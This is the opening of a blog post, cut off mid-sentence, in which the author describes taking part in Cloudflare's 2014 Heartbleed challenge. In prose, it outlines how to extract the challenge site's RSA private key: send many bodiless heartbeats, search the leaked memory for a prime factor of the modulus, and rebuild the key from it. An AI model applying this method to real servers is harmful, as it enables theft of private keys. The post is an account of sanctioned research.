Copyright Fedor Indutny view license - +1 << Home At April 11th 2014 Cloudflare has published a blog post suggesting to try out extracting a private key of their specially prepared challenge site using the Heartbleed OpenSSL vulnerability. Being busy at the time, I decided to give it a try a couple of hours later, if noone would crack it yet. This was a legal way to do some hackery, after all! The method of attack was following: Send a lot of random-sized fake heartbeats (without body) Try to find a 128-byte prime factor of the certificate's modulus Generate the rest of the private key's parameters out of it I wasn't searching for a PEM-encoded private key and/or: - - - - - BEGIN RSA PRIVATE KEY - - - - - for a couple of reasons: It is loaded only at the process startup The key may be encrypted, and there is no point in brute forcing it According to my tests, DER-encoded...